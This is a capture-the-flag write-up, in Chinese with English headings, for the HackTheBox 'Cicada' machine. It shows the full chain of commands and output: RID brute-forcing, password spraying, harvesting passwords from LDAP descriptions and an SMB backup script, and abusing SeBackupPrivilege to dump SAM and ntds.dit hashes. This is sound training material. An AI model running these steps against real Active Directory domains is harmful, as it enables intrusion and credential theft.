<h1 id="Rid-brute-to-getting-users-and-Password-spraying"><a href="#Rid-brute-to-getting-users-and-Password-spraying" class="headerlink" title="Rid-brute to getting users and Password spraying"></a>Rid-brute to getting users and Password spraying</h1><p>因爲沒有用戶，可以對 <code>\\pipe\\lsarpc</code>​ 進行 <code>rid-brute</code>​，</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">$ netexec smb 10.129.6.115 -u <span class="string">&#x27;guest&#x27;</span> -p <span class="string">&#x27;&#x27;</span> --rid-brute 10000</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        [+] cicada.htb\guest: </span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        501: CICADA\Guest (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        512: CICADA\Domain Admins (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        514: CICADA\Domain Guests (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        515: CICADA\Domain Computers (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        516: CICADA\Domain Controllers (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        517: CICADA\Cert Publishers (SidTypeAlias)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        518: CICADA\Schema Admins (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        519: CICADA\Enterprise Admins (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        520: CICADA\Group Policy Creator Owners (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        521: CICADA\Read-only Domain Controllers (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        522: CICADA\Cloneable Domain Controllers (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        526: CICADA\Key Admins (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        527: CICADA\Enterprise Key Admins (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        553: CICADA\RAS and IAS Servers (SidTypeAlias)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1101: CICADA\DnsAdmins (SidTypeAlias)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1102: CICADA\DnsUpdateProxy (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1103: CICADA\Groups (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1109: CICADA\Dev Support (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>上面的 <code>SidTypeUser</code>​ 都是用戶名，所以過濾掉就得到一堆用戶名：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">$ <span class="built_in">cat</span> user.txt | grep User</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        501: CICADA\Guest (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        513: CICADA\Domain Users (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        525: CICADA\Protected Users (SidTypeGroup)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)</span><br><span class="line">SMB         10.129.6.115    445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>做成一個列表，</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Administrator</span><br><span class="line">john.smoulder</span><br><span class="line">sarah.dantelia</span><br><span class="line">michael.wrightson</span><br><span class="line">david.orelious</span><br><span class="line">emily.oscars</span><br></pre></td></tr></table></figure>

<p>然後密碼噴射一下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ netexec smb 10.129.6.115 -u user1.txt -p <span class="string">&#x27;Cicada$M6Corpb*@Lp#nZp!8&#x27;</span> --continue-on-success</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002014932-ssafrdt.png" alt="image">​</p>
<p>結果得到了一個有效用戶，因爲這個用戶不知道可以做什麽，也不可以訪問smb的内容：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ netexec smb 10.129.6.115 -u <span class="string">&#x27;michael.wrightson&#x27;</span> -p <span class="string">&#x27;Cicada$M6Corpb*@Lp#nZp!8&#x27;</span> --shares</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002015022-so69svm.png" alt="image">​</p>
<h1 id="Reading-ldap-attributes"><a href="#Reading-ldap-attributes" class="headerlink" title="Reading ldap attributes"></a>Reading ldap attributes</h1><p>因爲smb無法訪問，所以另一個藏密碼的地方也只能是ldap裏面的description了，</p>
<h2 id="rpcclient-way"><a href="#rpcclient-way" class="headerlink" title="rpcclient way"></a>rpcclient way</h2><p>我可以使用 rpcclient 直接去獲取用戶的description：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ rpcclient -U <span class="string">&#x27;michael.wrightson%Cicada$M6Corpb*@Lp#nZp!8&#x27;</span> 10.129.6.115</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002015139-bo23tca.png" alt="image">​</p>
<h2 id="ldapsearch-way"><a href="#ldapsearch-way" class="headerlink" title="ldapsearch way"></a>ldapsearch way</h2><p>用 ldapsearch 也可以：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ldapsearch -D <span class="string">&#x27;cicada\michael.wrightson&#x27;</span> -w <span class="string">&#x27;Cicada$M6Corpb*@Lp#nZp!8&#x27;</span> -H ldap://10.129.6.115 -x -s base namingcontexts</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002015407-58e39ae.png" alt="image">​</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ ldapsearch -D <span class="string">&#x27;cicada\michael.wrightson&#x27;</span> -w <span class="string">&#x27;Cicada$M6Corpb*@Lp#nZp!8&#x27;</span> -H ldap://10.129.6.115 -x -b <span class="string">&quot;CN=Users,DC=cicada,DC=htb&quot;</span> | grep -E <span class="string">&quot;sAMAccountName|description&quot;</span></span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002015856-t9u1aya.png" alt="image">​</p>
<h1 id="Password-spraying-again-and-reading-smb-files"><a href="#Password-spraying-again-and-reading-smb-files" class="headerlink" title="Password spraying again and reading smb files"></a>Password spraying again and reading smb files</h1><p>拿到密碼之後就再進行一次密碼噴射：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002015905-etrm08d.png" alt="image">​</p>
<p>得到另一個用戶的密碼：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cicada.htb\david.orelious:aRt<span class="variable">$Lp</span><span class="comment">#7t*VQ!3 </span></span><br></pre></td></tr></table></figure>

<p>同樣的，因爲還有一個 DEV 的文件夾沒辦法訪問，所以嘗試看一下這個用戶是否可以訪問：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020524-kk4ume8.png" alt="image">​</p>
<p>結果好像可以，用smbmap 快速列舉一下裏面的文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ smbmap -u david.orelious -p <span class="string">&#x27;aRt$Lp#7t*VQ!3&#x27;</span> -H 10.129.6.115  -r DEV</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020610-jdjoau6.png" alt="image">​</p>
<p>有一個 backup_script 的脚本在裏面，所以下載下來：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ smbget --user david.orelious --recursive smb://10.129.6.115/DEV</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020652-romnv5m.png" alt="image">​</p>
<p>查看這個脚本：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020721-clpx93r.png" alt="image">​</p>
<p>裏面有一個密碼。</p>
<h1 id="Password-spraying-again-and-again-to-user"><a href="#Password-spraying-again-and-again-to-user" class="headerlink" title="Password spraying again and again to user"></a>Password spraying again and again to user</h1><p>再進行一次密碼噴射：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ netexec smb 10.129.6.115 -u user1.txt  -p <span class="string">&#x27;Q!3@Lp#M6b*7t*Vt&#x27;</span> --continue-on-success</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020747-htkqotd.png" alt="image">​</p>
<p>得到另一個有效賬戶，</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cicada.htb\emily.oscars:Q!3@Lp<span class="comment">#M6b*7t*Vt</span></span><br></pre></td></tr></table></figure>

<p>快速用netexc 探測下 winrm， 結果有訪問的權限：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020822-6jh0c3t.png" alt="image">​</p>
<p>於是就得到了 <code>user.txt</code>​ 。</p>
<h1 id="Exploit-SeBackupPrivilege-Permissions"><a href="#Exploit-SeBackupPrivilege-Permissions" class="headerlink" title="Exploit SeBackupPrivilege Permissions"></a>Exploit SeBackupPrivilege Permissions</h1><p>通過查看這個用戶后，可以看到有 <code>SeBackupPrivilege</code>​ 這個權限：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002020855-l7ftizb.png" alt="image">​</p>
<p>正常情況下 <code>sam</code>​ 只是作爲緩存，對於AD，密碼只能保存在 <code>ntds.dit</code>​。</p>
<h2 id="Dumping-hash-from-sam"><a href="#Dumping-hash-from-sam" class="headerlink" title="Dumping hash from sam"></a>Dumping hash from sam</h2><p>由於dump sam 比較簡單，先直接 dump sam看看，如果sam裏面沒有admin hash就去 dump <code>ntds.dit</code>​。</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002021045-g9l0ki3.png" alt="image">​</p>
<p>簡單的使用 <code>reg</code>​ 備份一下，會得到 <code>sam</code>​ 和 <code>system</code>​ 這兩個文件，傳到本地后，使用 <code>impacket-secretsdump</code>​ 就可以解壓hash：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ impacket-secretsdump -sam sam -system system <span class="built_in">local</span></span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002021253-rap4jlb.png" alt="image">​</p>
<p>嘗試一下這個hash是否有效，成功了。</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241002021333-l2xf10d.png" alt="image">​</p>
<h2 id="Dumping-hash-from-ntds-dit"><a href="#Dumping-hash-from-ntds-dit" class="headerlink" title="Dumping hash from ntds.dit"></a>Dumping hash from ntds.dit</h2><p>如果使用 ntds.dit 的話就可以參考這篇文章： <a target="_blank" rel="noopener" href="https://juggernaut-sec.com/sebackupprivilege/">https://juggernaut-sec.com/sebackupprivilege/</a> 大概命令是這樣子的，</p>
<p>首先創建一個備份分區：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mkdir C:\mane</span><br><span class="line"></span><br><span class="line">echo &quot;set context persistent nowriters&quot; | out-file ./diskshadow.txt -encoding ascii</span><br><span class="line">echo &quot;add volume c: alias temp&quot; | out-file ./diskshadow.txt -encoding ascii -append</span><br><span class="line">echo &quot;create&quot; | out-file ./diskshadow.txt -encoding ascii -append    </span><br><span class="line">echo &quot;expose %temp% z:&quot; | out-file ./diskshadow.txt -encoding ascii -append</span><br><span class="line"></span><br><span class="line">diskshadow.exe /s c:\mane\diskshadow.txt</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241004193428-cgis1i9.png" alt="image">​</p>
<p>然後載入<code>Copy-FileSeBackupPrivilege</code>​ 去複製 ntds.dit ：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Import-Module .\SeBackupPrivilegeUtils.dll</span><br><span class="line">Import-Module .\SeBackupPrivilegeCmdLets.dll</span><br><span class="line">Copy-FileSeBackupPrivilege Z:\Windows\NTDS\ntds.dit C:\mane\ntds.dit</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241004193811-60qm2a9.png" alt="image">​</p>
<p>得到 ntds 之後還需要dump sam：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">reg save HKLM\SYSTEM SYSTEM.SAV</span><br><span class="line">reg save HKLM\SAM SAM.SAV</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241004193822-gjqrn8f.png" alt="image">​</p>
<p>把它複製到本地：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ impacket-secretsdump -sam SAM.SAV -system SYSTEM.SAV -ntds ntds.dit local</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/10-mH6n1RSP773qx19p-Cicada/image-20241004194100-mhzou6z.png" alt="image">​</p>
<p>之後用 evil-winrm 登錄 admin 就可以了。</p>
<h1 id="Hashes"><a href="#Hashes" class="headerlink" title="Hashes"></a>Hashes</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line">$ impacket-secretsdump -sam sam -system system -ntds ntds.dit local</span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620</span><br><span class="line">[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)</span><br><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::</span><br><span class="line">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn&#x27;t have hash information.</span><br><span class="line">[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)</span><br><span class="line">[*] Searching for pekList, be patient</span><br><span class="line">[*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6</span><br><span class="line">[*] Reading and decrypting hashes from ntds.dit</span><br><span class="line">Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::</span><br><span class="line">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::</span><br><span class="line">CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::</span><br><span class="line">krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::</span><br><span class="line">cicada.htb\john.smoulder:1104:aad3b435b51404eeaad3b435b51404ee:0d33a055d07e231ce088a91975f28dc4:::</span><br><span class="line">cicada.htb\sarah.dantelia:1105:aad3b435b51404eeaad3b435b51404ee:d1c88b5c2ecc0e2679000c5c73baea20:::</span><br><span class="line">cicada.htb\michael.wrightson:1106:aad3b435b51404eeaad3b435b51404ee:b222964c9f247e6b225ce9e7c4276776:::</span><br><span class="line">cicada.htb\david.orelious:1108:aad3b435b51404eeaad3b435b51404ee:ef0bcbf3577b729dcfa6fbe1731d5a43:::</span><br><span class="line">cicada.htb\emily.oscars:1601:aad3b435b51404eeaad3b435b51404ee:559048ab2d168a4edf8e033d43165ee5:::</span><br><span class="line">[*] Kerberos keys from ntds.dit</span><br><span class="line">Administrator:aes256-cts-hmac-sha1-96:e47fd7646fa8cf1836a79166f5775405834e2c060322d229bc93f26fb67d2be5</span><br><span class="line">Administrator:aes128-cts-hmac-sha1-96:f51b243b116894bea389709127df1652</span><br><span class="line">Administrator:des-cbc-md5:c8838c9b10c43b23</span><br><span class="line">CICADA-DC$:aes256-cts-hmac-sha1-96:e9752f2c7752bd92142588e63dc0383499f49b04a46de37845e33d40de1db7ed</span><br><span class="line">CICADA-DC$:aes128-cts-hmac-sha1-96:7fc8e7f2daa14d0ccdf070de9cfc49c5</span><br><span class="line">CICADA-DC$:des-cbc-md5:b0f7cdec040d5b6d</span><br><span class="line">krbtgt:aes256-cts-hmac-sha1-96:357f15dd4d315af47ac63658c444526ec0186f066ad9efb46906a7308b7c60c8</span><br><span class="line">krbtgt:aes128-cts-hmac-sha1-96:39cbc0f220550c51fb89046ac652849e</span><br><span class="line">krbtgt:des-cbc-md5:73b6c419b3b9bf7c</span><br><span class="line">cicada.htb\john.smoulder:aes256-cts-hmac-sha1-96:57ae6faf294b7e6fbd0ce5121ac413d529ae5355535e20739a19b6fd2a204128</span><br><span class="line">cicada.htb\john.smoulder:aes128-cts-hmac-sha1-96:8c0add65bd3c9ad2d1f458a719cfda81</span><br><span class="line">cicada.htb\john.smoulder:des-cbc-md5:f1feaeb594b08575</span><br><span class="line">cicada.htb\sarah.dantelia:aes256-cts-hmac-sha1-96:e25f0b9181f532a85310ba6093f24c1f2f10ee857a97fe18d716ec713fc47060</span><br><span class="line">cicada.htb\sarah.dantelia:aes128-cts-hmac-sha1-96:2ac9a92bca49147a0530e5ce84ceee7d</span><br><span class="line">cicada.htb\sarah.dantelia:des-cbc-md5:0b5b014370fdab67</span><br><span class="line">cicada.htb\michael.wrightson:aes256-cts-hmac-sha1-96:d89ff79cc85032f27499425d47d3421df678eace01ce589eb128a6ffa0216f46</span><br><span class="line">cicada.htb\michael.wrightson:aes128-cts-hmac-sha1-96:f1290a5c4e9d4ef2cd7ad470600124a9</span><br><span class="line">cicada.htb\michael.wrightson:des-cbc-md5:eca8d532fd8f26bc</span><br><span class="line">cicada.htb\david.orelious:aes256-cts-hmac-sha1-96:125726466d0431ed1441caafe8c0ed9ec0d10b0dbaf4fec7a184b764d8a36323</span><br><span class="line">cicada.htb\david.orelious:aes128-cts-hmac-sha1-96:ce66c04e5fd902b15f5d4c611927c9c2</span><br><span class="line">cicada.htb\david.orelious:des-cbc-md5:83585bc41573897f</span><br><span class="line">cicada.htb\emily.oscars:aes256-cts-hmac-sha1-96:4abe28adc1d16373f4c8db4d9bfd34ea1928aca72cb69362d3d90f69d80c000f</span><br><span class="line">cicada.htb\emily.oscars:aes128-cts-hmac-sha1-96:f98d74d70dfb68b70ddd821edcd6a023</span><br><span class="line">cicada.htb\emily.oscars:des-cbc-md5:fd4a5497d38067cd</span><br><span class="line">[*] Cleaning up...</span><br></pre></td></tr></table></figure>


<h1 id="Thanks"><a href="#Thanks" class="headerlink" title="Thanks"></a>Thanks</h1><p><strong>Respect</strong>: If my writeup really helps you, <a target="_blank" rel="noopener" href="https://app.hackthebox.com/users/463126">Give me a respect</a> to let me know， Thankssssss!</p>
<p><strong>感謝</strong>: 製作不易，如果我的writeup真的幫到你了, <a target="_blank" rel="noopener" href="https://app.hackthebox.com/users/463126">給我一個respect</a>，這樣我就會知道，感謝你！</p>

    <iframe src="/maneplugin/badge/htb.html" style="border:none; height: 70px" title="description"></iframe>


<p><strong>Found Mistakes</strong>: If you find something wrong in the page, please feel free email to <a href="mailto:&#109;&#97;&#110;&#101;&#x40;&#x6d;&#97;&#110;&#x65;&#115;&#101;&#99;&#x2e;&#x63;&#x6f;&#x6d;">&#109;&#97;&#110;&#101;&#x40;&#x6d;&#97;&#110;&#x65;&#115;&#101;&#99;&#x2e;&#x63;&#x6f;&#x6d;</a> thanksss !!!</p>
<p><strong>發現一些錯誤</strong>: 如果你在文章中發現一些錯誤，請發郵件到 <a href="mailto:&#x6d;&#97;&#110;&#x65;&#64;&#109;&#97;&#x6e;&#101;&#x73;&#x65;&#99;&#46;&#99;&#111;&#x6d;">&#x6d;&#97;&#110;&#x65;&#64;&#109;&#97;&#x6e;&#101;&#x73;&#x65;&#99;&#46;&#99;&#111;&#x6d;</a> ，麻煩了！！</p>
<p><strong>Beginner Recommand</strong>: <a target="_blank" rel="noopener" href="https://referral.hackthebox.com/mz8fyQS">If you are a beginner, please use this link to sign up for an HTB Academy to get more Higher level of knowledge.</a></p>
<p><strong>新手非常推薦</strong>: <a target="_blank" rel="noopener" href="https://referral.hackthebox.com/mz8fyQS">如果你是初學者，可以用此鏈接來嘗試注冊 HTB Academy 賬號。</a></p>
<p>使用上面的鏈接加入 HTB 的 academy 就可以免費看 Tire 0 的所有教程，這對初學者來説是很友好的。 （建議先完成 INTRODUCTION TO ACADEMY）</p>
<p>Join HTB’s academy with this link to get free access to all the tutorials for Tire 0. This is very beginner friendly. (It is recommended to complete INTRODUCTION TO ACADEMY first)</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <script>
        setTimeout(() => {
          makeList({
             'target': '#toc-mobile',   // Selector for element to place table of contents
             'parent': 'article .content' // Selector for element to parse headers from (default: 'body')
          });
        }, 1000);
      </script>
    
    <div id="toc-footer" style="display: none">
      <div id="toc-mobile"></div>
    </div>

    <style>
        #toc-mobile {
        }
        #toc-mobile ul {
           display: grid ! important;
        }
        #toc-mobile li {
           margin: 0 0 0 0 ! important;
        }
        #toc-mobile .level-1 {
           color: #00b4dd ;
        }
        #toc-mobile .level-2 {
           color: #2bbc8a;
        }
        #toc-mobile .level-3 {
           color: #40474b;
        }
        #toc-mobile .level-4, #toc-mobile .level-5, #toc-mobile .level-6 {
           color: #8c8c8c;
        }
    </style>



    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&text=HackTheBox - Machine - Cicada"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&title=HackTheBox - Machine - Cicada"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://manesec.github.io/2024/10/04/2024-htb-machine/40-Cicada/&is_video=false&description=HackTheBox - Machine - Cicada"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
